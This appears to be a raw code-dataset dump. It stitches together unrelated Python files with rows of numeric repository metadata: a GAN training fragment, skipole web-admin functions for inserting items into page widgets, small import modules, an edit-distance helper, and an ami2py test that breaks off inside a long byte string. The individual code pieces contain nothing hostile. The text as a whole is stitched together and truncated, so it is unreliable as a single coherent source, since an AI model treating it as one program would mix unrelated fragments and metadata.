:param use_matching_aware: whether to use matching aware discrimination
:return: current loss (Wasserstein loss)
"""
from torch.nn import AvgPool2d
from torch.nn.functional import upsample
# downsample the real_batch for the given depth
down_sample_factor = int(np.power(2, self.depth - depth - 1))
prior_downsample_factor = max(int(np.power(2, self.depth - depth)), 0)
ds_real_samples = AvgPool2d(down_sample_factor)(real_batch)
if depth > 0:
prior_ds_real_samples = upsample(AvgPool2d(prior_downsample_factor)(real_batch),
scale_factor=2)
else:
prior_ds_real_samples = ds_real_samples
# real samples are a combination of ds_real_samples and prior_ds_real_samples
real_samples = (alpha * ds_real_samples) + ((1 - alpha) * prior_ds_real_samples)
loss_val = 0
for _ in range(self.n_critic):
# generate a batch of samples
fake_samples = self.gen(noise, depth, alpha).detach()
loss = self.loss.dis_loss(real_samples, fake_samples,
latent_vector, depth, alpha)
if use_matching_aware:
# calculate the matching aware distribution loss
mis_match_text = latent_vector[np.random.permutation(latent_vector.shape[0]), :]
m_a_d = self.dis(real_samples, mis_match_text, depth, alpha)
loss = loss + th.mean(m_a_d)
# optimize discriminator
self.dis_optim.zero_grad()
loss.backward()
self.dis_optim.step()
loss_val += loss.item()
return loss_val / self.n_critic
def optimize_generator(self, noise, latent_vector, depth, alpha):
"""
performs one step of weight update on generator for the given batch_size
:param noise: input random noise required for generating samples
:param latent_vector: (conditional latent vector)
:param depth: depth of the network at which optimization is done
:param alpha: value of alpha for fade-in effect
:return: current loss (Wasserstein estimate)
"""
# generate fake samples:
fake_samples = self.gen(noise, depth, alpha)
# TODO: Change this implementation for making it compatible for relativisticGAN
loss = self.loss.gen_loss(None, fake_samples, latent_vector, depth, alpha)
# optimize the generator
self.gen_optim.zero_grad()
loss.backward(retain_graph=True)
self.gen_optim.step()
# if use_ema is true, apply ema to the generator parameters
if self.use_ema:
self.__apply_ema_on_generator()
# return the loss value
return loss.item()
| 39.55538
| 96
| 0.606984
| 3,124
| 24,999
| 4.698464
| 0.098592
| 0.02003
| 0.019417
| 0.009811
| 0.872326
| 0.854408
| 0.836354
| 0.836354
| 0.810533
| 0.80079
| 0
| 0.012585
| 0.313453
| 24,999
| 632
| 97
| 39.55538
| 0.842627
| 0.291092
| 0
| 0.719626
| 0
| 0
| 0.031954
| 0
| 0
| 0
| 0
| 0.003165
| 0.028037
| 1
| 0.056075
| false
| 0
| 0.074766
| 0
| 0.174455
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac32e225a7b20e42f721559cc28621664c4e0fa7
| 23,198
|
py
|
Python
|
skipole/skiadmin/skiadminpackages/editwidgets/inserts.py
|
bernie-skipole/skipole
|
b45d3291c593e7c03c053ab4f192f1ecc5c3e9b9
|
[
"MIT"
] | null | null | null |
skipole/skiadmin/skiadminpackages/editwidgets/inserts.py
|
bernie-skipole/skipole
|
b45d3291c593e7c03c053ab4f192f1ecc5c3e9b9
|
[
"MIT"
] | null | null | null |
skipole/skiadmin/skiadminpackages/editwidgets/inserts.py
|
bernie-skipole/skipole
|
b45d3291c593e7c03c053ab4f192f1ecc5c3e9b9
|
[
"MIT"
] | null | null | null |
from ... import FailPage, ValidateError, GoTo, ServerError, skilift
from ....skilift import editpage, editsection
from ....ski.project_class_definition import SectionData
def show_empty_modal_insert(skicall):
"Fills in empty modal insert"
call_data = skicall.call_data
pd = call_data['pagedata']
sd = SectionData("widgetinserts")
sd["insertitem", "hide"] = False
location = call_data['location']
widget_name = location[0]
container = location[1]
# This should be for an empty container
if location[2]:
raise FailPage("Invalid location")
insert_location = widget_name + "-" + str(container)
# for each of the links, set get_field1 to be the insert_location
sd["insert_text","get_field1"] = insert_location
sd["insert_textblock","get_field1"] = insert_location
sd["insert_symbol","get_field1"] = insert_location
sd["insert_comment","get_field1"] = insert_location
sd["insert_element","get_field1"] = insert_location
sd["insert_widget","get_field1"] = insert_location
sd["insert_section","get_field1"] = insert_location
# set the hidden field
sd["uploadpart","hidden_field1"] = insert_location
pd.update(sd)
def insert_in_widget(skicall):
"""Called by domtable to either insert or append an item in a widget container
sets PageData object to populate the insert or append modal panel"""
call_data = skicall.call_data
pd = call_data['pagedata']
sd = SectionData("widgetinserts")
pagenumber = None
section_name = None
if "page_number" in call_data:
pagenumber = call_data["page_number"]
elif "section_name" in call_data:
section_name = call_data["section_name"]
else:
raise FailPage(message = "No page or section given")
if ('editdom', 'domtable', 'contents') not in call_data:
raise FailPage(message = "item to edit missing")
editedprojname = call_data['editedprojname']
part = call_data['editdom', 'domtable', 'contents']
# so part is location_string with string of integers
# where first string is the widget name,
# and first digit is the container number
# create location which is a tuple or list consisting of three items:
# widget name
# a container integer
# a tuple or list of location integers
location_list = part.split('-')
# first item should be a string, rest integers
# first item should be a string, rest integers
if len(location_list) < 3:
raise FailPage("Item to append to has not been recognised")
try:
widget_name = location_list[0]
container = int(location_list[1])
location_integers = tuple( int(i) for i in location_list[2:] )
except:
raise FailPage("Item to append to has not been recognised")
location = (widget_name, container, location_integers)
# get part_tuple from project, pagenumber, section_name, location
part_tuple = skilift.part_info(editedprojname, pagenumber, section_name, location)
if part_tuple is None:
raise FailPage("Item to append to has not been recognised")
insert_location = widget_name + '-' + str(container) + '-' + '-'.join(str(i) for i in location_integers)
# display the modal panel
sd["insertitem","hide"] = False
if (part_tuple.part_type == "Part") or (part_tuple.part_type == "Section"):
# insert
sd["insertpara","para_text"] = "Choose an item to insert"
sd["insertupload","para_text"] = "Or insert a new block by uploading a block definition file:"
else:
# append
sd["insertpara","para_text"] = "Choose an item to append"
sd["insertupload","para_text"] = "Or append a new block by uploading a block definition file:"
# for each of the links, set get_field1 to be the insert_location
sd["insert_text","get_field1"] = insert_location
sd["insert_textblock","get_field1"] = insert_location
sd["insert_symbol","get_field1"] = insert_location
sd["insert_comment","get_field1"] = insert_location
sd["insert_element","get_field1"] = insert_location
sd["insert_widget","get_field1"] = insert_location
if pagenumber:
sd["insert_section","get_field1"] = insert_location
# set the hidden field
sd["uploadpart","hidden_field1"] = insert_location
pd.update(sd)
def insert_text(skicall):
"Inserts text into a page"
call_data = skicall.call_data
pd = call_data['pagedata']
sd = SectionData("adminhead")
pagenumber = None
section_name = None
editedprojname = call_data['editedprojname']
if "page_number" in call_data:
pagenumber = call_data["page_number"]
page_info = skilift.item_info(editedprojname, pagenumber)
if page_info is None:
raise FailPage("Page to edit not identified")
if (page_info.item_type != "TemplatePage") and (page_info.item_type != "SVG"):
raise FailPage("Page not identified")
elif "section_name" in call_data:
section_name = call_data["section_name"]
else:
raise FailPage(message = "No page or section given")
if ("widgetinserts","insert_text","get_field1") not in call_data:
raise FailPage(message = "item to edit missing")
part = call_data["widgetinserts","insert_text","get_field1"]
location_list = part.split('-')
# first item should be a string, rest integers
try:
widget_name = location_list[0]
container = int(location_list[1])
if len(location_list) < 3:
location_integers = ()
else:
location_integers = tuple( int(i) for i in location_list[2:] )
except:
raise FailPage("Item to append to has not been recognised")
location = (widget_name, container, location_integers)
# get part_tuple from project, pagenumber, section_name, location
part_tuple = skilift.part_info(editedprojname, pagenumber, section_name, location)
if part_tuple is None:
raise FailPage("Item to append to has not been recognised")
new_text = 'Set text here'
if pagenumber:
call_data['pchange'], new_location = skilift.insert_item_in_page(editedprojname, pagenumber, call_data['pchange'], location, new_text)
sd["page_head","large_text"] = "Edit Text in Page: %s Widget: %s" % (pagenumber,widget_name)
else:
call_data['schange'], new_location = skilift.insert_item_in_section(editedprojname, section_name, call_data['schange'], location, new_text)
sd["page_head","large_text"] = "Edit Text in Section : %s Widget %s" % (section_name,widget_name)
pd.update(sd)
call_data['location'] = new_location
# go to edit text page, set the text in the text area
pd["text_input","input_text"] = new_text
def insert_textblock(skicall):
"Fills the template page for creating a textblock reference which will be inserted in the edited page"
call_data = skicall.call_data
pd = call_data['pagedata']
sd = SectionData("adminhead")
pagenumber = None
section_name = None
editedprojname = call_data['editedprojname']
if "page_number" in call_data:
pagenumber = call_data["page_number"]
page_info = skilift.item_info(editedprojname, pagenumber)
if page_info is None:
raise FailPage("Page to edit not identified")
if (page_info.item_type != "TemplatePage") and (page_info.item_type != "SVG"):
raise FailPage("Page not identified")
elif "section_name" in call_data:
section_name = call_data["section_name"]
else:
raise FailPage(message = "No page or section given")
if ("widgetinserts","insert_textblock","get_field1") not in call_data:
raise FailPage(message = "item to edit missing")
part = call_data["widgetinserts","insert_textblock","get_field1"]
location_list = part.split('-')
# first item should be a string, rest integers
try:
widget_name = location_list[0]
container = int(location_list[1])
if len(location_list) < 3:
location_integers = ()
else:
location_integers = tuple( int(i) for i in location_list[2:] )
except:
raise FailPage("Item to append to has not been recognised")
location = (widget_name, container, location_integers)
# get part_tuple from project, pagenumber, section_name, location
part_tuple = skilift.part_info(editedprojname, pagenumber, section_name, location)
if part_tuple is None:
raise FailPage("Item to append to has not been recognised")
call_data['location'] = location
# and set page data for the template page which inserts an textblock reference
if pagenumber:
sd["page_head","large_text"] = "Insert TextBlock in Page: %s Widget: %s" % (pagenumber, widget_name)
else:
sd["page_head","large_text"] = "Insert TextBlock in Section: %s Widget: %s" % (section_name, widget_name)
pd.update(sd)
pd["linebreaks","radio_values"]=['ON', 'OFF']
pd["linebreaks","radio_text"]=['On', 'Off']
pd["linebreaks","radio_checked"] = 'ON'
pd["setescape","radio_values"]=['ON', 'OFF']
pd["setescape","radio_text"]=['On', 'Off']
pd["setescape","radio_checked"] = 'ON'
def insert_symbol(skicall):
"Inserts html symbol into a page"
call_data = skicall.call_data
pd = call_data['pagedata']
sd = SectionData("adminhead")
pagenumber = None
section_name = None
editedprojname = call_data['editedprojname']
if "page_number" in call_data:
pagenumber = call_data["page_number"]
page_info = skilift.item_info(editedprojname, pagenumber)
if page_info is None:
raise FailPage("Page to edit not identified")
if (page_info.item_type != "TemplatePage") and (page_info.item_type != "SVG"):
raise FailPage("Page not identified")
elif "section_name" in call_data:
section_name = call_data["section_name"]
else:
raise FailPage(message = "No page or section given")
if ("widgetinserts","insert_symbol","get_field1") not in call_data:
raise FailPage(message = "item to edit missing")
part = call_data["widgetinserts","insert_symbol","get_field1"]
location_list = part.split('-')
# first item should be a string, rest integers
try:
widget_name = location_list[0]
container = int(location_list[1])
if len(location_list) < 3:
location_integers = ()
else:
location_integers = tuple( int(i) for i in location_list[2:] )
except:
raise FailPage("Item to append to has not been recognised")
location = (widget_name, container, location_integers)
# get part_tuple from project, pagenumber, section_name, location
part_tuple = skilift.part_info(editedprojname, pagenumber, section_name, location)
if part_tuple is None:
raise FailPage("Item to append to has not been recognised")
# then passed to edit symbol page
if pagenumber:
call_data['pchange'], new_location = editpage.create_html_symbol_in_page(editedprojname, pagenumber, call_data['pchange'], location)
sym = editpage.get_symbol(editedprojname, pagenumber, call_data['pchange'], new_location)
sd["page_head","large_text"] = "Edit Symbol in Page: %s Widget: %s" % (pagenumber, widget_name)
else:
call_data['schange'], new_location = editsection.create_html_symbol_in_section(editedprojname, section_name, call_data['schange'], location)
sym = editsection.get_symbol(editedprojname, section_name, call_data['schange'], new_location)
sd["page_head","large_text"] = "Edit Symbol in Section: %s Widget: %s" % (section_name, widget_name)
pd.update(sd)
call_data['location'] = new_location
pd["symbol_input","input_text"] = sym
def insert_comment(skicall):
"Inserts a comment into a page"
call_data = skicall.call_data
pd = call_data['pagedata']
sd = SectionData("adminhead")
pagenumber = None
section_name = None
editedprojname = call_data['editedprojname']
if "page_number" in call_data:
pagenumber = call_data["page_number"]
page_info = skilift.item_info(editedprojname, pagenumber)
if page_info is None:
raise FailPage("Page to edit not identified")
if (page_info.item_type != "TemplatePage") and (page_info.item_type != "SVG"):
raise FailPage("Page not identified")
elif "section_name" in call_data:
section_name = call_data["section_name"]
else:
raise FailPage(message = "No page or section given")
if ("widgetinserts","insert_comment","get_field1") not in call_data:
raise FailPage(message = "item to edit missing")
part = call_data["widgetinserts","insert_comment","get_field1"]
location_list = part.split('-')
# first item should be a string, rest integers
try:
widget_name = location_list[0]
container = int(location_list[1])
if len(location_list) < 3:
location_integers = ()
else:
location_integers = tuple( int(i) for i in location_list[2:] )
except:
raise FailPage("Item to append to has not been recognised")
location = (widget_name, container, location_integers)
# get part_tuple from project, pagenumber, section_name, location
part_tuple = skilift.part_info(editedprojname, pagenumber, section_name, location)
if part_tuple is None:
raise FailPage("Item to append to has not been recognised")
# then passed to edit symbol page
if pagenumber:
call_data['pchange'], new_location = editpage.create_html_comment_in_page(editedprojname, pagenumber, call_data['pchange'], location)
com = editpage.get_comment(editedprojname, pagenumber, call_data['pchange'], new_location)
sd["page_head","large_text"] = "Edit Comment in Page: %s Widget: %s" % (pagenumber, widget_name)
else:
call_data['schange'], new_location = editsection.create_html_comment_in_section(editedprojname, section_name, call_data['schange'], location)
com = editsection.get_comment(editedprojname, section_name, call_data['schange'], new_location)
sd["page_head","large_text"] = "Edit Comment in Section: %s Widget: %s" % (section_name, widget_name)
pd.update(sd)
call_data['location'] = new_location
pd["comment_input","input_text"] = com
def insert_element(skicall):
"Fills the template page for creating an html element which will be inserted in the edited page"
call_data = skicall.call_data
pd = call_data['pagedata']
sd = SectionData("adminhead")
pagenumber = None
section_name = None
editedprojname = call_data['editedprojname']
if "page_number" in call_data:
pagenumber = call_data["page_number"]
page_info = skilift.item_info(editedprojname, pagenumber)
if page_info is None:
raise FailPage("Page to edit not identified")
if (page_info.item_type != "TemplatePage") and (page_info.item_type != "SVG"):
raise FailPage("Page not identified")
elif "section_name" in call_data:
section_name = call_data["section_name"]
else:
raise FailPage(message = "No page or section given")
if ("widgetinserts","insert_element","get_field1") not in call_data:
raise FailPage(message = "item to edit missing")
part = call_data["widgetinserts","insert_element","get_field1"]
location_list = part.split('-')
# first item should be a string, rest integers
try:
widget_name = location_list[0]
container = int(location_list[1])
if len(location_list) < 3:
location_integers = ()
else:
location_integers = tuple( int(i) for i in location_list[2:] )
except:
raise FailPage("Item to append to has not been recognised")
location = (widget_name, container, location_integers)
# get part_tuple from project, pagenumber, section_name, location
part_tuple = skilift.part_info(editedprojname, pagenumber, section_name, location)
if part_tuple is None:
raise FailPage("Item to append to has not been recognised")
call_data['location'] = location
# and set page data for the template page which inserts an HTML element
if pagenumber:
sd["page_head","large_text"] = "Insert an HTML element into Page: %s Widget: %s" % (pagenumber, widget_name)
else:
sd["page_head","large_text"] = "Insert an HTML element into Section: %s Widget: %s" % (section_name, widget_name)
pd.update(sd)
def insert_widget(skicall):
"Gets page number and location, used for creating a widget which will be inserted in the page"
call_data = skicall.call_data
pagenumber = None
section_name = None
editedprojname = call_data['editedprojname']
if "page_number" in call_data:
pagenumber = call_data["page_number"]
page_info = skilift.item_info(editedprojname, pagenumber)
if page_info is None:
raise FailPage("Page to edit not identified")
if (page_info.item_type != "TemplatePage") and (page_info.item_type != "SVG"):
raise FailPage("Page not identified")
elif "section_name" in call_data:
section_name = call_data["section_name"]
else:
raise FailPage(message = "No page or section given")
if ("widgetinserts","insert_widget","get_field1") not in call_data:
raise FailPage(message = "item to edit missing")
part = call_data["widgetinserts","insert_widget","get_field1"]
location_list = part.split('-')
# first item should be a string, rest integers
try:
widget_name = location_list[0]
container = int(location_list[1])
if len(location_list) < 3:
location_integers = ()
else:
location_integers = tuple( int(i) for i in location_list[2:] )
except:
raise FailPage("Item to append to has not been recognised")
location = (widget_name, container, location_integers)
# get part_tuple from project, pagenumber, section_name, location
part_tuple = skilift.part_info(editedprojname, pagenumber, section_name, location)
if part_tuple is None:
raise FailPage("Item to append to has not been recognised")
call_data['location'] = location
# at this point, the call is passed to 54507 which is a responder which lists widget modules
# and displays them on a template
def insert_section(skicall):
"Gets page number and location, used for creating a section reference which will be inserted in the page"
call_data = skicall.call_data
pd = call_data['pagedata']
sd = SectionData("adminhead")
pagenumber = None
section_name = None
editedprojname = call_data['editedprojname']
if "page_number" in call_data:
pagenumber = call_data["page_number"]
else:
raise FailPage(message = "No page given")
if ("widgetinserts","insert_section","get_field1") not in call_data:
raise FailPage(message = "item to edit missing")
page_info = skilift.item_info(editedprojname, pagenumber)
if page_info is None:
raise FailPage("Page to edit not identified")
if (page_info.item_type != "TemplatePage") and (page_info.item_type != "SVG"):
raise FailPage("Page not identified")
part = call_data["widgetinserts","insert_section","get_field1"]
location_list = part.split('-')
# first item should be a string, rest integers
try:
widget_name = location_list[0]
container = int(location_list[1])
if len(location_list) < 3:
location_integers = ()
else:
location_integers = tuple( int(i) for i in location_list[2:] )
except:
raise FailPage("Item to append to has not been recognised")
location = (widget_name, container, location_integers)
# get part_tuple from project, pagenumber, section_name, location
part_tuple = skilift.part_info(editedprojname, pagenumber, None, location)
if part_tuple is None:
raise FailPage("Item to append to has not been recognised")
call_data['location'] = location
# Fill in header
sd["page_head","large_text"] = "Insert Section place holder"
pd.update(sd)
# get current sections
section_list = editsection.list_section_names(editedprojname)
if not section_list:
pd["nosection", "show"] = True
pd["descript", "show"] = False
pd["placename","show"] = False
return
pd['sectionname','option_list'] = section_list[:]
pd['sectionname','selectvalue'] = section_list[0]
def insert_upload(skicall):
"Gets page number and location, used for creating a widget which will be inserted in the page"
call_data = skicall.call_data
pagenumber = None
section_name = None
editedprojname = call_data['editedprojname']
if "page_number" in call_data:
pagenumber = call_data["page_number"]
page_info = skilift.item_info(editedprojname, pagenumber)
if page_info is None:
raise FailPage("Page to edit not identified")
if (page_info.item_type != "TemplatePage") and (page_info.item_type != "SVG"):
raise FailPage("Page not identified")
elif "section_name" in call_data:
section_name = call_data["section_name"]
else:
raise FailPage(message = "No page or section given")
if ("widgetinserts","uploadpart","hidden_field1") not in call_data:
raise FailPage(message = "item to edit missing")
part = call_data["widgetinserts","uploadpart","hidden_field1"]
location_list = part.split('-')
# first item should be a string, rest integers
try:
widget_name = location_list[0]
container = int(location_list[1])
if len(location_list) < 3:
location_integers = ()
else:
location_integers = tuple( int(i) for i in location_list[2:] )
except:
raise FailPage("Item to append to has not been recognised")
location = (widget_name, container, location_integers)
# get part_tuple from project, pagenumber, section_name, location
part_tuple = skilift.part_info(editedprojname, pagenumber, section_name, location)
if part_tuple is None:
raise FailPage("Item to append to has not been recognised")
# get file contents
file_contents = call_data["widgetinserts","uploadpart", "action"]
json_string = file_contents.decode(encoding='utf-8')
try:
if pagenumber:
call_data['pchange'] = editpage.create_part_in_page(editedprojname, pagenumber, call_data['pchange'], location, json_string)
else:
call_data['schange'] = editsection.create_part_in_section(editedprojname, section_name, call_data['schange'], location, json_string)
except ServerError as e:
if e.message:
raise FailPage(e.message)
else:
raise FailPage("An error has occurred in creating the item")
call_data['widget_name'] = widget_name
call_data['container'] = container
call_data['status'] = 'New block created'
| 40.134948
| 149
| 0.678205
| 2,984
| 23,198
| 5.072051
| 0.068365
| 0.063958
| 0.017179
| 0.023852
| 0.852725
| 0.826032
| 0.815395
| 0.806673
| 0.781896
| 0.761943
| 0
| 0.004421
| 0.21989
| 23,198
| 577
| 150
| 40.204506
| 0.831906
| 0.117338
| 0
| 0.762791
| 0
| 0
| 0.260979
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0.006977
| 0
| 0.032558
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac69c7aa8ebd71ef086ea2e0cacf4c3fa1cd1086
| 114
|
py
|
Python
|
sumo_docker_pipeline/operation_module/__init__.py
|
Kensuke-Mitsuzawa/sumo_docker_pipeline
|
b16c7e0da4938bf813f2af2ed667887b4f9a6298
|
[
"MIT"
] | null | null | null |
sumo_docker_pipeline/operation_module/__init__.py
|
Kensuke-Mitsuzawa/sumo_docker_pipeline
|
b16c7e0da4938bf813f2af2ed667887b4f9a6298
|
[
"MIT"
] | 14
|
2021-05-23T14:16:21.000Z
|
2021-12-05T21:59:56.000Z
|
sumo_docker_pipeline/operation_module/__init__.py
|
Kensuke-Mitsuzawa/sumo_docker_pipeline
|
b16c7e0da4938bf813f2af2ed667887b4f9a6298
|
[
"MIT"
] | 1
|
2021-12-31T15:10:20.000Z
|
2021-12-31T15:10:20.000Z
|
from .docker_operation_module import SumoDockerController
from .local_operation_module import LocalSumoController
| 38
| 57
| 0.912281
| 12
| 114
| 8.333333
| 0.666667
| 0.3
| 0.42
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070175
| 114
| 2
| 58
| 57
| 0.943396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ac835e1013519f195f4915f2072e63eff2a69922
| 130
|
py
|
Python
|
molsysmt/element/group/terminal_capping/__init__.py
|
uibcdf/MolModMTs
|
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
|
[
"MIT"
] | null | null | null |
molsysmt/element/group/terminal_capping/__init__.py
|
uibcdf/MolModMTs
|
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
|
[
"MIT"
] | null | null | null |
molsysmt/element/group/terminal_capping/__init__.py
|
uibcdf/MolModMTs
|
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
|
[
"MIT"
] | null | null | null |
from .names import n_terminal_capping_names, c_terminal_capping_names, names
from .is_terminal_capping import is_terminal_capping
| 43.333333
| 76
| 0.892308
| 20
| 130
| 5.3
| 0.4
| 0.566038
| 0.377358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 130
| 2
| 77
| 65
| 0.883333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3bb19dd4e1d237af6ee822505fe85d14bbdc5314
| 163
|
py
|
Python
|
debarcer/src/edit_distance.py
|
bgfritz1/debarcer_tobias
|
5c99abcee72f4605610473da0a56632d4fe824d3
|
[
"MIT"
] | null | null | null |
debarcer/src/edit_distance.py
|
bgfritz1/debarcer_tobias
|
5c99abcee72f4605610473da0a56632d4fe824d3
|
[
"MIT"
] | null | null | null |
debarcer/src/edit_distance.py
|
bgfritz1/debarcer_tobias
|
5c99abcee72f4605610473da0a56632d4fe824d3
|
[
"MIT"
] | null | null | null |
def edit_distance(a, b):
"""Returns the Hamming edit distance between two strings."""
return sum(letter_a != letter_b for letter_a, letter_b in zip(a, b))
| 40.75
| 72
| 0.705521
| 28
| 163
| 3.928571
| 0.607143
| 0.218182
| 0.236364
| 0.254545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177914
| 163
| 4
| 72
| 40.75
| 0.820896
| 0.331288
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
3bda8126a849871fd59f6d62cfd06797c445e1f2
| 9,840
|
py
|
Python
|
tests/test_basic_read.py
|
raaghulr/ami2py
|
a8ba8e83f91760e8ec6c3337199eef9800a80547
|
[
"MIT"
] | 10
|
2020-04-30T03:22:57.000Z
|
2021-09-07T09:33:20.000Z
|
tests/test_basic_read.py
|
raaghulr/ami2py
|
a8ba8e83f91760e8ec6c3337199eef9800a80547
|
[
"MIT"
] | 4
|
2020-09-17T01:21:53.000Z
|
2022-03-27T01:49:11.000Z
|
tests/test_basic_read.py
|
raaghulr/ami2py
|
a8ba8e83f91760e8ec6c3337199eef9800a80547
|
[
"MIT"
] | 4
|
2020-04-07T11:47:05.000Z
|
2021-12-28T16:17:28.000Z
|
from ami2py import AmiReader
from ami2py.ami_construct import Master, SymbolConstruct,SymbolHeader
from ami2py.consts import DATEPACKED, OPEN
import time
import os
from ami2py.ami_symbol_facade import AmiSymbolDataFacade
def test_symbol_header():
test_data_folder = os.path.dirname(__file__)
header_data_path = os.path.join(test_data_folder, "./HeaderData/3DA.AX")
f = open(header_data_path, "rb")
binfile = f.read()
f.close()
defheader=b'BROKDAt5SPCE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x